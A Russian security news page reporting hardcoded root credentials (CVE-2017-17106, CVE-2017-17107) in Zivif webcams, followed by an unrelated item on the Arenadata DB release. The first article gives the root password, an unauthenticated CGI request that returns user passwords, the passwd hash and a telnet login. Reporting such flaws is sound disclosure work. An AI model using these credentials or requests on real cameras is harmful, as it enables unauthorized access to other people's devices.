В веб-камерах Zivif обнаружен жестко закодированный рутовый пароль

В веб-камерах Zivif обнаружен жестко закодированный рутовый пароль

В веб-камерах Zivif обнаружен жестко закодированный рутовый пароль

Веб-камеры Zivif PR115-204-P-RS V2.3.4.2103 содержат жестко закодированный пароль cat1029, использующийся для пользователя root. Настройка операционной системы SONIX делает этот пароль неизменяемым, соответственно, его можно использовать для доступа к устройству через сеанс TELNET.

Как утверждают специалисты, камерам Zivif недостает контроля доступа, в результате функции CGI можно вызывать напрямую, обходя проверки подлинности.

Проблема получила идентификатор CVE-2017-17106, заключается она в том, что камера на запрос http://<Адрес Камеры>/web/cgi-bin/hi3510/param.cgi?cmd=getuser отвечает следующим образом:

var name0="admin"; var password0="admin"; var authLevel0="255"; var
name1="guest"; var password1="guest"; var authLevel1="3"; var
name2="admin2"; var password2="admin"; var authLevel2="3"; var name3="";
var password3=""; var authLevel3="3"; var name4=""; var password4="";
var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3";
var name6=""; var password6=""; var authLevel6="3"; var name7=""; var
password7=""; var authLevel7="3"; var name8=""; var password8=""; var
authLevel8="0"; var name9=""; var password9=""; var authLevel9="0

Учетные данные возвращаются в текстовом виде.

Также эксперты отметили в файле /etc/passwd наличие жестко закодированной записи (CVE-2017-17107): 

root:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh

Зашифрованный пароль - cat1029.

(none) login: root
Password:
Login incorrect
(none) login: root
Password:
Welcome to SONIX.
\u@\h:\W$

Из-за того, как структурирована файловая система, изменение этого пароля составит нетривиальную задачу.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Вышел первый релиз СУБД Arenadata DB на базе Greengage

Группа Arenadata представила первый релиз своей MPP-СУБД Arenadata DB (ADB), собранный на основе открытого проекта Greengage. Это важный шаг, который закрепляет полную независимость развития продукта от технологии Greenplum, ранее служившей его основой.

В рамках перехода команда настроила CI/CD-процессы для сборки ADB из репозиториев Greengage и обновила всю техническую документацию. Новый релиз Arenadata DB 6.29.0 стал ключевым этапом, который создаёт фундамент для дальнейшего развития системы.

По словам технического директора Arenadata Дмитрия Плужникова, после ухода Greenplum из open source было важно сохранить контроль над развитием ядра:

«Теперь мы можем самостоятельно вносить изменения в код, решать накопленные проблемы и развивать технологию вместе с профессиональным сообществом».

Одним из первых практических результатов перехода стало устранение проблемы «брошенных» файлов (orphaned files) — давнего бага, унаследованного от PostgreSQL и долго не исправлявшегося в апстриме Greenplum.

Переход на Greengage даёт Arenadata возможность параллельно поддерживать две линии развития продукта:

  • текущую — ADB 6, с сохранением обратной совместимости;
  • и новую — ADB 7, релиз которой запланирован на конец 2025 года.

Проект Greengage, на котором теперь основана СУБД, развивается как самостоятельное решение с открытым кодом под лицензией Apache 2.0. Arenadata поддерживает открытую модель разработки и уже запустила процедуру приёма внешних коммитов, позволяющую сторонним разработчикам вносить вклад в улучшение системы.

Arenadata DB остаётся массивно-параллельной реляционной СУБД для работы с большими объёмами данных — от десятков до сотен терабайт. Система рассчитана на выполнение сложных аналитических запросов и построение корпоративных хранилищ с горизонтальной масштабируемостью.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru